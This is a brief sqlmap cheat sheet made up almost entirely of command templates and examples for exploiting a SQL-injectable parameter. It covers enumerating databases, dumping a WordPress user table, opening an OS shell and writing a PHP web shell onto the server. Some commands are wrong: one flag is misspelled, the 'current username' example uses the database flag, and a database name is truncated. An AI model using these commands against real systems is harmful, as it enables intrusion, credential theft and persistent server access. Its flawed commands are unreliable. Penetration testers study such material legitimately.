SqlMap Cheatsheet


sqlmap is an amazing and super useful penetration testing tool that automates the process of detecting and exploiting SQL injection.

Get DBMS banner

Sintaxis:

sqlmap <url> -p <parameter vulnerable> -b

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -b

Get  current database name

Sintaxis

sqlmap <url> -p <parameter vulnerable> --currentdb

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --currentdb

Get current username

Sintaxis:

sqlmap <url> -p <parameter vulnerable> --current-user

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --current-db

Get the list of tables in a database

Sintaxis:

sqlmap <url> -p <parameter vulnerable> -D <database_name> --tables

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --tables

Get the list of columns in a table

Sintaxis:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --columns

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --columns

Dump table information

Sintax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --dump

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users  --dump

Spawn a Shell

Sintax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> --os-shell

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --os-shell

Uploading a shell

Sintax

sqlmap <url> --file-dest="<remoteDirectory>" --file-write="<yourLocalFile.php>"

Example

sqlmap http://target.com/vulnerable.php?id=123 -p id --file-dest="/var/www/uploads/shell.php" --file-write="/tmp/myshell.php"

Executing a Query

Sintax

sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --sql-query <sql_sentence>

Example

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_d --sql-query "Select * from wp_users;"